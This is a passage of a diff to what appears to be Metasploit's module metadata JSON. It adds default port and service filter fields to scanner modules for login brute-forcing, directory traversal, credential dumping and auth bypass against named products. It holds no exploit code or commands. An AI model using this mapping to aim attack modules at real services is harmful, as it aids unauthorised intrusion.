"targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/acpp/login.rb", @@ -12525,6 +16576,12 @@ "platform": "", "arch": "", "rport": 548, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/afp/afp_login.rb", @@ -12554,6 +16611,12 @@ "platform": "", "arch": "", "rport": 548, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/afp/afp_server_info.rb", @@ -12585,6 +16648,12 @@ "platform": "", "arch": "", "rport": 7777, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb", @@ -12615,6 +16684,12 @@ "platform": "", "arch": "", "rport": 19, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/chargen/chargen_probe.rb", @@ -12644,6 +16719,21 @@ "platform": "", "arch": "", "rport": 5984, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-25 01:05:18 +0000", "path": "/modules/auxiliary/scanner/couchdb/couchdb_enum.rb", @@ -12673,6 +16763,21 @@ "platform": "", "arch": "", "rport": 5984, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/couchdb/couchdb_login.rb", @@ -12702,6 +16807,12 @@ "platform": "", "arch": "", "rport": 50000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/db2/db2_auth.rb", @@ -12731,6 +16842,12 @@ "platform": "", "arch": "", "rport": 50000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/db2/db2_version.rb", @@ -12760,6 +16877,12 @@ "platform": "", "arch": "", "rport": 523, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/db2/discovery.rb", @@ -12789,6 +16912,12 @@ "platform": "", "arch": "", "rport": 135, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb", @@ -12818,6 +16947,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-12-31 14:41:33 +0000", "path": "/modules/auxiliary/scanner/dcerpc/hidden.rb", @@ -12847,6 +16982,12 @@ "platform": "", "arch": "", "rport": 135, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/dcerpc/management.rb", @@ -12876,6 +17017,12 @@ "platform": "", "arch": "", "rport": 135, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb", @@ -12906,6 +17053,12 @@ "platform": "", "arch": "", "rport": 5040, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb", @@ -12935,6 +17088,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/dect/call_scanner.rb", @@ -12964,6 +17123,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/dect/station_scanner.rb", @@ -12993,6 +17158,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-31 04:53:14 +0000", "path": "/modules/auxiliary/scanner/discovery/arp_sweep.rb", @@ -13022,6 +17193,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/discovery/empty_udp.rb", @@ -13051,6 +17228,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb", @@ -13080,6 +17263,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-31 04:53:14 +0000", "path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb", @@ -13110,6 +17299,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-31 04:53:14 +0000", "path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb", @@ -13139,6 +17334,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-05-31 14:32:31 +0000", "path": "/modules/auxiliary/scanner/discovery/udp_probe.rb", @@ -13168,6 +17369,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/discovery/udp_sweep.rb", @@ -13200,6 +17407,12 @@ "platform": "", "arch": "", "rport": 2067, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb", @@ -13230,6 +17443,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/dns/dns_amp.rb", @@ -13259,6 +17478,21 @@ "platform": "", "arch": "", "rport": 9200, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/elasticsearch/indices_enum.rb", @@ -13288,6 +17522,12 @@ "platform": "", "arch": "", "rport": 3000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb", @@ -13317,6 +17557,12 @@ "platform": "", "arch": "", "rport": 3500, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb", @@ -13347,6 +17593,22 @@ "platform": "", "arch": "", "rport": 2379, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 2379 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-04-04 10:52:47 +0000", "path": "/modules/auxiliary/scanner/etcd/open_key_scanner.rb", @@ -13377,6 +17639,22 @@ "platform": "", "arch": "", "rport": 2379, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 2379 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-04-04 11:01:38 +0000", "path": "/modules/auxiliary/scanner/etcd/version.rb", @@ -13406,6 +17684,12 @@ "platform": "", "arch": "", "rport": 79, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-02-20 15:48:00 +0000", "path": "/modules/auxiliary/scanner/finger/finger_users.rb", @@ -13435,6 +17719,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ftp/anonymous.rb", @@ -13467,6 +17758,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", @@ -13499,6 +17797,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-12-11 14:40:09 +0000", "path": "/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb", @@ -13528,6 +17833,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ftp/easy_file_sharing_ftp.rb", @@ -13557,6 +17869,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-12-14 08:05:57 +0000", "path": "/modules/auxiliary/scanner/ftp/ftp_login.rb", @@ -13586,6 +17905,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ftp/ftp_version.rb", @@ -13620,6 +17946,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb", @@ -13652,6 +17985,13 @@ "platform": "Windows", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb", @@ -13684,6 +18024,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb", @@ -13713,6 +18060,12 @@ "platform": "", "arch": "", "rport": 70, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-10-20 09:44:07 +0000", "path": "/modules/auxiliary/scanner/gopher/gopher_gophermap.rb", @@ -13742,6 +18095,12 @@ "platform": "", "arch": "", "rport": 1720, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/h323/h323_version.rb", @@ -13773,6 +18132,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb", @@ -13803,6 +18177,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb", @@ -13836,6 +18225,21 @@ "platform": "", "arch": "", "rport": 8400, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/adobe_xml_inject.rb", @@ -13865,6 +18269,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/advantech_webaccess_login.rb", @@ -13898,6 +18317,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb", @@ -13931,6 +18365,21 @@ "platform": "", "arch": "", "rport": 8161, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb", @@ -13963,6 +18412,21 @@ "platform": "", "arch": "", "rport": 8161, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/apache_activemq_traversal.rb", @@ -13999,6 +18463,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-17 22:29:20 +0000", "path": "/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb", @@ -14035,6 +18514,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-27 13:11:22 +0000", "path": "/modules/auxiliary/scanner/http/apache_optionsbleed.rb", @@ -14069,6 +18563,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/apache_userdir_enum.rb", @@ -14099,6 +18608,21 @@ "platform": "", "arch": "", "rport": 7000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/appletv_login.rb", @@ -14135,6 +18659,22 @@ "platform": "", "arch": "", "rport": 8095, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 8095 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb", @@ -14165,6 +18705,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/axis_local_file_include.rb", @@ -14195,6 +18750,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/axis_login.rb", @@ -14224,6 +18794,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-22 20:50:22 +0000", "path": "/modules/auxiliary/scanner/http/backup_file.rb", @@ -14255,6 +18840,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb", @@ -14284,6 +18884,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/bavision_cam_login.rb", @@ -14313,6 +18928,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb", @@ -14347,6 +18977,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb", @@ -14376,6 +19021,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/blind_sql_query.rb", @@ -14407,6 +19067,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb", @@ -14436,6 +19111,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/brute_dirs.rb", @@ -14465,6 +19155,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/buffalo_login.rb", @@ -14494,6 +19199,21 @@ "platform": "", "arch": "", "rport": 81, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-09-15 00:18:33 +0000", "path": "/modules/auxiliary/scanner/http/buildmaster_login.rb", @@ -14527,6 +19247,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb", @@ -14558,6 +19293,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/canon_wireless.rb", @@ -14587,6 +19337,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cert.rb", @@ -14619,6 +19375,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-13 15:48:21 +0000", "path": "/modules/auxiliary/scanner/http/cgit_traversal.rb", @@ -14648,6 +19419,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/chef_webui_login.rb", @@ -14677,6 +19463,21 @@ "platform": "", "arch": "", "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-01 15:05:49 +0000", "path": "/modules/auxiliary/scanner/http/chromecast_webserver.rb", @@ -14706,6 +19507,21 @@ "platform": "", "arch": "", "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-01 15:05:49 +0000", "path": "/modules/auxiliary/scanner/http/chromecast_wifi.rb", @@ -14735,6 +19551,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_asa_asdm.rb", @@ -14766,6 +19597,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_device_manager.rb", @@ -14798,6 +19644,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-01 13:30:19 +0000", "path": "/modules/auxiliary/scanner/http/cisco_directory_traversal.rb", @@ -14829,6 +19690,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_firepower_download.rb", @@ -14858,6 +19734,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_firepower_login.rb", @@ -14890,6 +19781,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb", @@ -14919,6 +19825,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_ironport_enum.rb", @@ -14949,6 +19870,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb", @@ -14978,6 +19914,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-05-10 09:57:50 +0000", "path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb", @@ -15010,6 +19961,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb", @@ -15041,6 +20007,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/clansphere_traversal.rb", @@ -15071,6 +20052,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-19 16:48:41 +0000", "path": "/modules/auxiliary/scanner/http/cnpilot_r_web_login_loot.rb", @@ -15105,6 +20101,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb", @@ -15135,6 +20146,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/coldfusion_version.rb", @@ -15166,6 +20192,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/concrete5_member_list.rb", @@ -15195,6 +20236,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/copy_of_file.rb", @@ -15225,6 +20281,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/crawler.rb", @@ -15254,6 +20325,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dell_idrac.rb", @@ -15284,6 +20370,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-03 20:23:33 +0000", "path": "/modules/auxiliary/scanner/http/dicoogle_traversal.rb", @@ -15313,6 +20414,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 